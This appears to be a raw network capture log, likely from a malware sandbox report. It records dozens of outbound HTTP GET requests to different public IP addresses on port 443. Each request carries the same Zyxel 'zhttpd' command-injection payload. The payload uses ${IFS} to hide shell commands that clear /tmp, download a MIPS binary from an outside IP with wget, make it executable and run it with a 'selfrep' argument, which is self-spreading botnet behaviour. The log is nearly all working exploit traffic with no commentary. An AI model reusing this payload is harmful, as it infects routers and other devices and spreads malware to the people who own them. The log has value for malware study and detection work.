                                            Feb 2, 2024 06:21:14.663613081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4890192.168.2.1556258163.18.85.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667157888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4891192.168.2.1558412210.156.222.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667192936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4892192.168.2.155014437.53.69.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667244911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4893192.168.2.1549096179.107.98.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667288065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4894192.168.2.153695017.40.18.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667311907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4895192.168.2.153668425.180.57.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667376995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4896192.168.2.155564263.139.157.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667397022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4897192.168.2.1541470106.206.91.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667417049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4898192.168.2.153713077.254.191.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667463064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4899192.168.2.1538968175.123.98.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667498112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4900192.168.2.1553442162.14.74.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667553902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4901192.168.2.1560320149.21.179.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667592049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4902192.168.2.1560528104.9.36.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667648077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4903192.168.2.1549316110.4.89.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667680979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4904192.168.2.1552832171.66.99.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667711020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4905192.168.2.1557542126.140.238.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667783022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4906192.168.2.1534390209.161.101.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667804003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4907192.168.2.1560374118.17.155.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667850971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4908192.168.2.1536358159.87.83.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667874098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4909192.168.2.153694451.94.202.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667905092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4910192.168.2.153367698.202.184.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667944908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4911192.168.2.1536214222.77.123.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.667999983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4912192.168.2.1533628203.247.216.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.668032885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4913192.168.2.154136075.116.102.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.668062925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4914192.168.2.1551974134.197.166.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676141977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4915192.168.2.1534508182.74.222.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676182032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4916192.168.2.1533304156.48.9.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676227093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4917192.168.2.154380697.19.195.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676275015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4918192.168.2.1559806117.146.178.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676331043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4919192.168.2.153891899.25.3.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676363945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4920192.168.2.1544880146.249.190.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676393986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4921192.168.2.155516241.193.229.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676426888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4922192.168.2.1545292203.95.212.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676481009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4923192.168.2.155670446.174.224.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676522017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4924192.168.2.1543478150.91.111.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676559925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4925192.168.2.1553680180.161.203.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676589012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4926192.168.2.154746614.17.70.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676650047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4927192.168.2.1539072185.12.56.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676659107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4928192.168.2.1539950104.9.40.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676700115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4929192.168.2.155054432.175.17.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676747084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4930192.168.2.1534214147.109.81.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676785946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4931192.168.2.154628871.156.144.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676816940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4932192.168.2.1556506193.211.124.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676857948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4933192.168.2.1559018208.57.60.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676879883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4934192.168.2.1548046130.218.119.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676934958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4935192.168.2.154963668.159.254.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.676970959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4936192.168.2.1552950109.17.220.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677022934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4937192.168.2.1539242149.37.95.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677052021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4938192.168.2.153965482.116.116.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677086115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4939192.168.2.155096824.2.204.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677134991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4940192.168.2.155346096.232.236.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677159071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4941192.168.2.1537394163.170.4.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677192926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4942192.168.2.154793214.163.223.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677227974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4943192.168.2.1534038171.25.69.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677294970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4944192.168.2.154537691.19.25.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677320004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4945192.168.2.1549234185.37.191.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677350998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4946192.168.2.1541124182.103.103.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677413940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4947192.168.2.155650044.254.247.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677448988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4948192.168.2.155828697.9.160.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677481890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4949192.168.2.1547474147.79.39.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677508116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4950192.168.2.1542838130.31.53.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677556992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4951192.168.2.155226682.9.228.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677624941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4952192.168.2.1553144152.132.251.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.677650928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4953192.168.2.154194264.156.73.201443
                                            TimestampBytes transferredDirectionData
